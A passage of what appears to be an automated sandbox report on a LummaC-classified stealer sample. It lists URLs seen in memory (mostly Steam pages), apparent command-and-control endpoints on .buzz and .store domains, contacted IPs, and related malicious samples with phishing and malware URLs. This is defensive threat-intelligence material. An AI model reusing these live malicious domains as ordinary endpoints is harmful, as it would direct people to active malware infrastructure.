                          https://store.steampowered.com/points/shop/file.exe, 00000000.00000003.1812861155.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816814540.000000000102E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://sketchfab.comfile.exe, 00000000.00000003.1813045734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812736354.0000000001016000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                          https://lv.queniujq.cnfile.exe, 00000000.00000003.1813045734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812736354.0000000001016000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://steamcommunity.com/profiles/76561199724331900/inventory/file.exe, 00000000.00000003.1812874348.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813045734.0000000000F98000.00000004.00000020.00020000.00000000.sdmptrue
                          • URL Reputation: malware
                          		unknown
                          https://www.youtube.com/file.exe, 00000000.00000003.1813045734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812736354.0000000001016000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                          https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&afile.exe, 00000000.00000003.1812874348.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813045734.0000000000F98000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                          https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgfile.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813045734.0000000000F98000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://store.steampowered.com/privacy_agreement/file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://store.steampowered.com/Zfile.exe, 00000000.00000003.1812861155.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816814540.000000000102E000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                          https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=enfile.exe, 00000000.00000003.1812861155.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816814540.000000000102E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amfile.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://www.google.com/recaptcha/file.exe, 00000000.00000003.1812736354.0000000001016000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                          https://checkout.steampowered.com/file.exe, 00000000.00000003.1813045734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812736354.0000000001016000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=englishfile.exe, 00000000.00000003.1812861155.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816814540.000000000102E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                          https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englishfile.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngfile.exe, 00000000.00000003.1812861155.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816814540.000000000102E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englisfile.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                          https://sensatinwu.buzz:443/apibcryptPrimitives.dll(file.exe, 00000000.00000003.1813045734.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1815851267.0000000000F9F000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCfile.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://store.steampowered.com/;file.exe, 00000000.00000003.1813045734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812736354.0000000001016000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://store.steampowered.com/about/file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://steamcommunity.com/my/wishlist/file.exe, 00000000.00000003.1812861155.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816814540.000000000102E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                            https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=englishfile.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://help.steampowered.com/en/file.exe, 00000000.00000003.1812861155.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816814540.000000000102E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/file.exe, 00000000.00000003.1813045734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812736354.0000000001016000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                            https://steamcommunity.com/market/file.exe, 00000000.00000003.1812861155.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816814540.000000000102E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                            https://store.steampowered.com/news/file.exe, 00000000.00000003.1812861155.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816814540.000000000102E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://community.akamai.steamstatic.com/file.exe, 00000000.00000003.1812736354.0000000001016000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://store.steampowered.com/subscriber_agreement/file.exe, 00000000.00000003.1812874348.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812846129.000000000103E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813045734.0000000000F98000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgfile.exe, 00000000.00000003.1812874348.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812846129.000000000103E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813045734.0000000000F98000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                            https://sensatinwu.buzz/pifile.exe, 00000000.00000003.1812736354.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813197895.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816020866.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1file.exe, 00000000.00000003.1812861155.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816814540.000000000102E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://recaptcha.net/recaptcha/;file.exe, 00000000.00000003.1813045734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812736354.0000000001016000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=enfile.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://steamcommunity.com/discussions/file.exe, 00000000.00000003.1812861155.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816814540.000000000102E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                              https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=9yzMGndrVfY4&amp;l=efile.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                              https://store.steampowered.com/stats/file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://medal.tvfile.exe, 00000000.00000003.1813045734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812736354.0000000001016000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://broadcast.st.dl.eccdnx.comfile.exe, 00000000.00000003.1813045734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812736354.0000000001016000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1file.exe, 00000000.00000003.1812874348.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813045734.0000000000F98000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://store.steampowered.com/steam_refunds/file.exe, 00000000.00000003.1812861155.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816814540.000000000102E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                              https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=AeTzfile.exe, 00000000.00000003.1812874348.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813045734.0000000000F98000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                https://sensatinwu.buzz/file.exe, 00000000.00000003.1812736354.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812736354.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813197895.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812874348.0000000000FB6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816020866.0000000000FB6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816020866.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://steamcommunity.com/workshop/file.exe, 00000000.00000003.1812861155.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816814540.000000000102E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://login.steampowered.com/file.exe, 00000000.00000003.1812736354.0000000001016000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://store.steampowered.com/legal/file.exe, 00000000.00000003.1812874348.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812846129.000000000103E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813045734.0000000000F98000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=efile.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvfile.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://sensatinwu.buzz/api(Qfile.exe, 00000000.00000003.1812736354.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813197895.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816020866.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=englfile.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://recaptcha.netfile.exe, 00000000.00000003.1813045734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812736354.0000000001016000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://store.steampowered.com/file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvwfile.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.giffile.exe, 00000000.00000003.1812874348.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813045734.0000000000F98000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://127.0.0.1:27060file.exe, 00000000.00000003.1813045734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812736354.0000000001016000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=10oP_O2Rfile.exe, 00000000.00000003.1812874348.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813045734.0000000000F98000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016file.exe, 00000000.00000003.1812861155.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816814540.000000000102E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://spirittunek.store:443/apifile.exe, 00000000.00000003.1813045734.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1815851267.0000000000F9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=englishfile.exe, 00000000.00000003.1812861155.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816814540.000000000102E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://studennotediw.store:443/apiIfile.exe, 00000000.00000003.1813045734.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1815851267.0000000000F9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://help.steampowered.com/file.exe, 00000000.00000003.1812736354.0000000001016000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://api.steampowered.com/file.exe, 00000000.00000003.1812736354.0000000001016000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://store.steampowered.com/account/cookiepreferences/file.exe, 00000000.00000003.1812874348.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812846129.000000000103E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813045734.0000000000F98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://store.steampowered.com/mobilefile.exe, 00000000.00000003.1812861155.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816814540.000000000102E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://avatars.akamai.steamstatic.com/fFfile.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://steamcommunity.com/file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown

                                                    World Map of Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public IPs

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    188.114.96.3
                                                    		sensatinwu.buzzEuropean Union
                                                    		13335CLOUDFLARENETUStrue
                                                    104.102.49.254
                                                    		steamcommunity.comUnited States
                                                    		16625AKAMAI-ASUSfalse

                                                    General Information

                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1526564
                                                    Start date and time:2024-10-06 11:34:06 +02:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 3m 2s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:1
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:file.exe
                                                    Detection:MAL
                                                    Classification:mal100.troj.evad.winEXE@1/0@11/2
                                                    EGA Information:
                                                    • Successful, ratio: 100%
                                                    HCA Information:Failed
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe
                                                    • Stop behavior analysis, all processes terminated

                                                    Warnings

                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    05:35:07API Interceptor3x Sleep call for process: file.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    188.114.96.3c1#U09a6.exeGet hashmaliciousUnknownBrowse
                                                    • winfileshare.com/ticket_line/llb.php
                                                    QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                    • filetransfer.io/data-package/eZFzMENr/download
                                                    QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                    • filetransfer.io/data-package/eZFzMENr/download
                                                    1tstvk3Sls.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                    • microsoft-rage.world/Api/v3/qjqzqiiqayjq
                                                    http://Asm.alcateia.orgGet hashmaliciousHTMLPhisherBrowse
                                                    • asm.alcateia.org/
                                                    hbwebdownload - MT 103.exeGet hashmaliciousFormBookBrowse
                                                    • www.j88.travel/c24t/?Edg8Tp=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+lW3g3vOrk23&iL30=-ZRd9JBXfLe8q2J
                                                    z4Shipping_document_pdf.exeGet hashmaliciousFormBookBrowse
                                                    • www.bayarcepat19.click/g48c/
                                                    update SOA.exeGet hashmaliciousFormBookBrowse
                                                    • www.bayarcepat19.click/5hcm/
                                                    docs.exeGet hashmaliciousFormBookBrowse
                                                    • www.j88.travel/c24t/?I6=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+la3znjNy02hfQbCEg==&AL0=9rN46F
                                                    https://wwvmicrosx.live/office365/office_cookies/mainGet hashmaliciousHTMLPhisherBrowse
                                                    • wwvmicrosx.live/office365/office_cookies/main/
                                                    104.102.49.254http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                    • www.valvesoftware.com/legal.htm

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    sensatinwu.buzzfile.exeGet hashmaliciousLummaCBrowse
                                                    • 188.114.96.3
                                                    steamcommunity.comfile.exeGet hashmaliciousLummaCBrowse
                                                    • 104.102.49.254
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                    • 104.102.49.254
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                    • 104.102.49.254
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                    • 104.102.49.254
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                    • 104.102.49.254
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                    • 104.102.49.254
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                    • 104.102.49.254
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                    • 104.102.49.254
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                    • 104.102.49.254
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                    • 104.102.49.254

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    CLOUDFLARENETUSBooking_0106.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 172.67.74.152
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                    • 188.114.96.3
                                                    Confirm Me.exeGet hashmaliciousSTRRATBrowse
                                                    • 104.20.3.235
                                                    PInstaller.exeGet hashmaliciousSTRRATBrowse
                                                    • 104.20.3.235
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                    • 172.67.151.30
                                                    updater.exeGet hashmaliciousXmrigBrowse
                                                    • 172.67.162.29
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                    • 172.67.151.30
                                                    http://www.grandsignatureyercaud.com/Get hashmaliciousUnknownBrowse
                                                    • 104.21.51.144
                                                    http://www.nesianlife.com/Get hashmaliciousUnknownBrowse
                                                    • 104.18.39.195
                                                    https://daf2019.com/8/02Get hashmaliciousUnknownBrowse
